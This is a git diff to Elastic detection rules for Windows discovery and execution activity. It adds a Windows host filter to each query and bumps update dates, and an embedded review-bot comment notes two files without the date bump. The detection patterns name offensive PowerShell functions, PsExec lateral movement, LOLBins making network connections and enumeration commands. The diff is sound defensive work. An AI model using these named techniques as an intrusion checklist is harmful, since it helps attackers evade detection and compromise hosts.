diff --git a/rules/windows/discovery_enumerating_domain_trusts_via_nltest.toml b/rules/windows/discovery_enumerating_domain_trusts_via_nltest.toml
index 9911c0564..f9ffae75f 100644
--- a/rules/windows/discovery_enumerating_domain_trusts_via_nltest.toml
+++ b/rules/windows/discovery_enumerating_domain_trusts_via_nltest.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -40,7 +40,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : "nltest.exe" and process.args : (
 "/DCLIST:*", "/DCNAME:*", "/DSGET*",
 "/LSAQUERYFTI:*", "/PARENTDOMAIN",
diff --git a/rules/windows/discovery_files_dir_systeminfo_via_cmd.toml b/rules/windows/discovery_files_dir_systeminfo_via_cmd.toml
index 11bb10015..ca2e9ff24 100644
--- a/rules/windows/discovery_files_dir_systeminfo_via_cmd.toml
+++ b/rules/windows/discovery_files_dir_systeminfo_via_cmd.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -55,7 +55,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : "cmd.exe" and process.args : "/c" and process.args : ("set", "dir")
 '''
diff --git a/rules/windows/discovery_group_policy_object_discovery.toml b/rules/windows/discovery_group_policy_object_discovery.toml
index 2b585b6f3..61892a1df 100644
--- a/rules/windows/discovery_group_policy_object_discovery.toml
+++ b/rules/windows/discovery_group_policy_object_discovery.toml
@@ -4,7 +4,7 @@ integration = ["windows", "endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/18"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name: "gpresult.exe" or process.pe.original_file_name == "gprslt.exe") and process.args: ("/z", "/v", "/r", "/x")
 '''
diff --git a/rules/windows/discovery_net_view.toml b/rules/windows/discovery_net_view.toml
index bd595800b..6788ad3ea 100644
--- a/rules/windows/discovery_net_view.toml
+++ b/rules/windows/discovery_net_view.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -54,7 +54,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 ((process.name : "net.exe" or process.pe.original_file_name == "net.exe") or
 ((process.name : "net1.exe" or process.pe.original_file_name == "net1.exe") and
 not process.parent.name : "net.exe")) and
diff --git a/rules/windows/discovery_peripheral_device.toml b/rules/windows/discovery_peripheral_device.toml
index e3f4788cf..14a2fa4a8 100644
--- a/rules/windows/discovery_peripheral_device.toml
+++ b/rules/windows/discovery_peripheral_device.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "fsutil.exe" or process.pe.original_file_name == "fsutil.exe") and process.args : "fsinfo" and process.args : "drives"
 '''
diff --git a/rules/windows/discovery_posh_invoke_sharefinder.toml b/rules/windows/discovery_posh_invoke_sharefinder.toml
index e3e3a60f6..b97968d0d 100644
--- a/rules/windows/discovery_posh_invoke_sharefinder.toml
+++ b/rules/windows/discovery_posh_invoke_sharefinder.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/05"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -82,7 +82,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text:(
 "Invoke-ShareFinder" or
 "Invoke-ShareFinderThreaded" or
diff --git a/rules/windows/discovery_posh_suspicious_api_functions.toml b/rules/windows/discovery_posh_suspicious_api_functions.toml
index f22861863..cc2a30ede 100644
--- a/rules/windows/discovery_posh_suspicious_api_functions.toml
+++ b/rules/windows/discovery_posh_suspicious_api_functions.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/17"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -83,7 +83,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text : (
 NetShareEnum or
 NetWkstaUserEnum or
diff --git a/rules/windows/discovery_post_exploitation_external_ip_lookup.toml b/rules/windows/discovery_post_exploitation_external_ip_lookup.toml
index 7ec2f620c..782fdf285 100644
--- a/rules/windows/discovery_post_exploitation_external_ip_lookup.toml
+++ b/rules/windows/discovery_post_exploitation_external_ip_lookup.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-network where network.protocol == "dns" and
+network where host.os.type == "windows" and network.protocol == "dns" and
 process.name != null and user.id not in ("S-1-5-19", "S-1-5-20") and
 event.action == "lookup_requested" and
 /* Add new external IP lookup services here */
diff --git a/rules/windows/discovery_privileged_localgroup_membership.toml b/rules/windows/discovery_privileged_localgroup_membership.toml
index d398c66d1..c8bde3608 100644
--- a/rules/windows/discovery_privileged_localgroup_membership.toml
+++ b/rules/windows/discovery_privileged_localgroup_membership.toml
@@ -91,7 +91,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-iam where event.action == "user-member-enumerated" and
+iam where host.os.type == "windows" and event.action == "user-member-enumerated" and
 /* excluding machine account */
 not winlog.event_data.SubjectUserName: ("*$", "LOCAL SERVICE", "NETWORK SERVICE") and
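Review bot: The query change in `discovery_privileged_localgroup_membership.toml` is not paired with an `updated_date` bump: every other file section in this diff combines the `host.os.type` edit with `-updated_date … +updated_date = "2023/02/22"`, while this section holds only the `@@ -91,7 +91,7 @@` hunk. The same gap appears in `execution_from_unusual_path_cmdline.toml` further down, whose section likewise shows a single query hunk. Unless both files already carry `updated_date = "2023/02/22"` from an earlier change, the metadata should be bumped so the rule version tracks the query edit like the rest of the commit. The `query` string of this rule continues past the end of the hunk.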
diff --git a/rules/windows/discovery_remote_system_discovery_commands_windows.toml b/rules/windows/discovery_remote_system_discovery_commands_windows.toml
index ebff2bfec..fd194fef5 100644
--- a/rules/windows/discovery_remote_system_discovery_commands_windows.toml
+++ b/rules/windows/discovery_remote_system_discovery_commands_windows.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -54,7 +54,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 ((process.name : "nbtstat.exe" and process.args : ("-n", "-s")) or
 (process.name : "arp.exe" and process.args : "-a") or
 (process.name : "nltest.exe" and process.args : ("/dclist", "/dsgetdc")) or
diff --git a/rules/windows/discovery_security_software_wmic.toml b/rules/windows/discovery_security_software_wmic.toml
index 230e98c62..f7d781a01 100644
--- a/rules/windows/discovery_security_software_wmic.toml
+++ b/rules/windows/discovery_security_software_wmic.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -57,7 +57,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name:"wmic.exe" or process.pe.original_file_name:"wmic.exe") and
 process.args:"/namespace:\\\\root\\SecurityCenter2" and process.args:"Get"
 '''
diff --git a/rules/windows/discovery_system_service_discovery.toml b/rules/windows/discovery_system_service_discovery.toml
index 2ae88364c..83a45eb7e 100644
--- a/rules/windows/discovery_system_service_discovery.toml
+++ b/rules/windows/discovery_system_service_discovery.toml
@@ -4,7 +4,7 @@ integration = ["windows", "endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/24"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -25,7 +25,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 ((process.name: "net.exe" or process.pe.original_file_name == "net.exe" or (process.name : "net1.exe" and not process.parent.name : "net.exe")) and process.args : ("start", "use") and process.args_count == 2) or
 ((process.name: "sc.exe" or process.pe.original_file_name == "sc.exe") and process.args: ("query", "q*")) or
diff --git a/rules/windows/discovery_system_time_discovery.toml b/rules/windows/discovery_system_time_discovery.toml
index 489d5f95a..7f29c8c8e 100644
--- a/rules/windows/discovery_system_time_discovery.toml
+++ b/rules/windows/discovery_system_time_discovery.toml
@@ -4,7 +4,7 @@ integration = ["windows", "endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/17"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -24,7 +24,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 ((process.name: "net.exe" or (process.name : "net1.exe" and not process.parent.name : "net.exe")) and process.args : "time") or
 (process.name: "w32tm.exe" and process.args: "/tz") or
diff --git a/rules/windows/discovery_whoami_command_activity.toml b/rules/windows/discovery_whoami_command_activity.toml
index 8f4b320fb..f0f6d49fd 100644
--- a/rules/windows/discovery_whoami_command_activity.toml
+++ b/rules/windows/discovery_whoami_command_activity.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and process.name : "whoami.exe" and
+process where host.os.type == "windows" and event.type == "start" and process.name : "whoami.exe" and
 (
 (/* scoped for whoami execution under system privileges */
diff --git a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml
index ae1ecc902..78d7aa6c2 100644
--- a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml
+++ b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and process.name: ("cmd.exe", "powershell.exe") and
+process where host.os.type == "windows" and event.type == "start" and process.name: ("cmd.exe", "powershell.exe") and
 process.parent.name: (
 "ConfigurationWizard*.exe",
 "NetflowDatabaseMaintenance*.exe",
diff --git a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml
index aab56638a..c42fa79f9 100644
--- a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml
+++ b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name: ("SolarWinds.BusinessLayerHost.exe", "SolarWinds.BusinessLayerHostx64.exe") and
 not process.name : (
 "APMServiceControl*.exe",
diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml
index 51542a324..659916fb2 100644
--- a/rules/windows/execution_com_object_xwizard.toml
+++ b/rules/windows/execution_com_object_xwizard.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.pe.original_file_name : "xwizard.exe" and
 (
 (process.args : "RunWizard" and process.args : "{*}") or
diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml
index 917e55dbc..479f4d304 100644
--- a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml
+++ b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -32,8 +32,8 @@ type = "eql"
 query = '''
 sequence by process.entity_id
- [process where process.name : "cmd.exe" and event.type == "start"]
- [network where process.name : "cmd.exe" and
+ [process where host.os.type == "windows" and process.name : "cmd.exe" and event.type == "start"]
+ [network where host.os.type == "windows" and process.name : "cmd.exe" and
 not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24",
 "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32",
 "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24",
diff --git a/rules/windows/execution_command_shell_started_by_svchost.toml b/rules/windows/execution_command_shell_started_by_svchost.toml
index 8a7ec65fa..5f15f904b 100644
--- a/rules/windows/execution_command_shell_started_by_svchost.toml
+++ b/rules/windows/execution_command_shell_started_by_svchost.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -81,7 +81,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "svchost.exe" and process.name : "cmd.exe" and
diff --git a/rules/windows/execution_command_shell_started_by_unusual_process.toml b/rules/windows/execution_command_shell_started_by_unusual_process.toml
index 50a8ef2c6..c8a5bb5b9 100644
--- a/rules/windows/execution_command_shell_started_by_unusual_process.toml
+++ b/rules/windows/execution_command_shell_started_by_unusual_process.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : "cmd.exe" and
 process.parent.name : ("lsass.exe",
 "csrss.exe",
diff --git a/rules/windows/execution_command_shell_via_rundll32.toml b/rules/windows/execution_command_shell_via_rundll32.toml
index fd3816413..6d805c059 100644
--- a/rules/windows/execution_command_shell_via_rundll32.toml
+++ b/rules/windows/execution_command_shell_via_rundll32.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/07"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : ("cmd.exe", "powershell.exe") and process.parent.name : "rundll32.exe" and process.parent.command_line != null and
 /* common FPs can be added here */
diff --git a/rules/windows/execution_downloaded_shortcut_files.toml b/rules/windows/execution_downloaded_shortcut_files.toml
index 2925d4c1b..77abfdca6 100644
--- a/rules/windows/execution_downloaded_shortcut_files.toml
+++ b/rules/windows/execution_downloaded_shortcut_files.toml
@@ -3,7 +3,7 @@ creation_date = "2020/09/02"
 integration = ["endpoint", "windows"]
 maturity = "development"
 query_schema_validation = false
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,9 +27,9 @@ query = '''
 sequence by process.entity_id with maxspan=2s
 /* file.extension added to endpoint fields for 7.10 */
- [file where event.type == "creation" and file.extension == "lnk"]
+ [file where host.os.type == "windows" and event.type == "creation" and file.extension == "lnk"]
 /* not sure yet how the update will capture ADS */
- [file where event.type == "creation" and file.extension == "lnk:Zone.Identifier" and
+ [file where host.os.type == "windows" and event.type == "creation" and file.extension == "lnk:Zone.Identifier" and
 /* non-ECS field - may disqualify conversion */
 file.Ext.windows.zone_identifier > 1]
 '''
diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml
index f075d3571..ecb4e2844 100644
--- a/rules/windows/execution_downloaded_url_file.toml
+++ b/rules/windows/execution_downloaded_url_file.toml
@@ -3,7 +3,7 @@ creation_date = "2020/09/02"
 integration = ["endpoint", "windows"]
 maturity = "development"
 query_schema_validation = false
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,9 +26,9 @@ query = '''
 /* leaving in development pending `file.Ext.windows.zone_identifier` landing in ECS then endpoint */
 sequence by process.entity_id with maxspan=2s
- [file where event.type == "creation" and file.extension == "url" and
+ [file where host.os.type == "windows" and event.type == "creation" and file.extension == "url" and
 not process.name == "explorer.exe"]
- [file where event.type == "creation" and file.extension == "url:Zone.Identifier" and
+ [file where host.os.type == "windows" and event.type == "creation" and file.extension == "url:Zone.Identifier" and
 /* non-ECS field - may disqualify conversion */
 file.Ext.windows.zone_identifier > 1 and not process.name == "explorer.exe"]
 '''
diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml
index ba386b449..3c304678e 100644
--- a/rules/windows/execution_enumeration_via_wmiprvse.toml
+++ b/rules/windows/execution_enumeration_via_wmiprvse.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/18"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name:
 (
 "arp.exe",
diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml
index cade8b4ab..22d9fe16e 100644
--- a/rules/windows/execution_from_unusual_path_cmdline.toml
+++ b/rules/windows/execution_from_unusual_path_cmdline.toml
@@ -89,7 +89,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : ("wscript.exe",
 "cscript.exe",
 "rundll32.exe",
diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
index 2bf108d6d..dc918ac1c 100644
--- a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
+++ b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,8 +27,8 @@ type = "eql"
 query = '''
 sequence by process.entity_id
- [process where process.name : "hh.exe" and event.type == "start"]
- [network where process.name : "hh.exe" and
+ [process where host.os.type == "windows" and process.name : "hh.exe" and event.type == "start"]
+ [network where host.os.type == "windows" and process.name : "hh.exe" and
 not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4",
diff --git a/rules/windows/execution_ms_office_written_file.toml b/rules/windows/execution_ms_office_written_file.toml
index 5abfc6cbc..5fad22a35 100644
--- a/rules/windows/execution_ms_office_written_file.toml
+++ b/rules/windows/execution_ms_office_written_file.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -73,7 +73,7 @@ type = "eql"
 query = '''
 sequence with maxspan=2h
- [file where event.type != "deletion" and file.extension : "exe" and
+ [file where host.os.type == "windows" and event.type != "deletion" and file.extension : "exe" and
 (process.name : "WINWORD.EXE" or
 process.name : "EXCEL.EXE" or
 process.name : "OUTLOOK.EXE" or
@@ -83,7 +83,7 @@ sequence with maxspan=2h
 process.name : "MSPUB.EXE" or
 process.name : "MSACCESS.EXE") ] by host.id, file.path
- [process where event.type == "start"] by host.id, process.executable
+ [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable
 '''
diff --git a/rules/windows/execution_pdf_written_file.toml b/rules/windows/execution_pdf_written_file.toml
index 3b036ce51..4684ea4f4 100644
--- a/rules/windows/execution_pdf_written_file.toml
+++ b/rules/windows/execution_pdf_written_file.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -73,7 +73,7 @@ type = "eql"
 query = '''
 sequence with maxspan=2h
- [file where event.type != "deletion" and file.extension : "exe" and
+ [file where host.os.type == "windows" and event.type != "deletion" and file.extension : "exe" and
 (process.name : "AcroRd32.exe" or
 process.name : "rdrcef.exe" or
 process.name : "FoxitPhantomPDF.exe" or
@@ -85,7 +85,7 @@ sequence with maxspan=2h
 file.name : "AcroRd32.exe" or file.name : "rdrcef.exe") ] by host.id, file.path
- [process where event.type == "start"] by host.id, process.executable
+ [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable
 '''
diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml
index 9c8c16c89..caa60f503 100644
--- a/rules/windows/execution_posh_hacktool_functions.toml
+++ b/rules/windows/execution_posh_hacktool_functions.toml
@@ -2,7 +2,7 @@ creation_date = "2023/01/17"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2023/01/17"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -47,7 +47,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text : ( "Add-DomainGroupMember" or "Add-DomainObjectAcl" or "Add-RemoteConnection" or "Add-ServiceDacl" or
diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml
index 17640f4f4..27b88113b 100644
--- a/rules/windows/execution_posh_portable_executable.toml
+++ b/rules/windows/execution_posh_portable_executable.toml
@@ -2,7 +2,7 @@ creation_date = "2021/10/15"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -104,7 +104,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text : ( TVqQAAMAAAAEAAAA ) and not user.id : "S-1-5-18"
diff --git a/rules/windows/execution_posh_psreflect.toml b/rules/windows/execution_posh_psreflect.toml
index 8031158e3..68e559f51 100644
--- a/rules/windows/execution_posh_psreflect.toml
+++ b/rules/windows/execution_posh_psreflect.toml
@@ -2,7 +2,7 @@ creation_date = "2021/10/15"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -115,7 +115,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text:( "New-InMemoryModule" or "Add-Win32Type" or
diff --git a/rules/windows/execution_psexec_lateral_movement_command.toml b/rules/windows/execution_psexec_lateral_movement_command.toml
index f849d9e7a..556d2c907 100644
--- a/rules/windows/execution_psexec_lateral_movement_command.toml
+++ b/rules/windows/execution_psexec_lateral_movement_command.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -63,7 +63,7 @@ type = "eql"
 query = '''
 sequence by process.entity_id
- [process where process.name : "PsExec.exe" and event.type == "start" and
+ [process where host.os.type == "windows" and process.name : "PsExec.exe" and event.type == "start" and
 /* This flag suppresses the display of the license dialog and may indicate that psexec executed for the first time in the machine */
@@ -74,7 +74,7 @@ sequence by process.entity_id
 "?:\\Program Files\\Docusnap X\\Bin\\psexec.exe", "?:\\Program Files\\Docusnap X\\Tools\\dsDNS.exe") and not process.parent.executable : "?:\\Program Files (x86)\\Cynet\\Cynet Scanner\\CynetScanner.exe"]
- [network where process.name : "PsExec.exe"]
+ [network where host.os.type == "windows" and process.name : "PsExec.exe"]
 '''
diff --git a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
index b666d5cb8..8a35a43b1 100644
--- a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
+++ b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -32,14 +32,14 @@ type = "eql"
 query = '''
 sequence by process.entity_id
- [process where event.type == "start" and
+ [process where host.os.type == "windows" and event.type == "start" and
 process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and not ( (?process.Ext.token.integrity_level_name : "System" or ?winlog.event_data.IntegrityLevel : "System") and (process.parent.name : "msiexec.exe" or process.parent.executable : ("C:\\Program Files (x86)\\*.exe", "C:\\Program Files\\*.exe")) ) ]
- [network where process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and
+ [network where host.os.type == "windows" and process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and
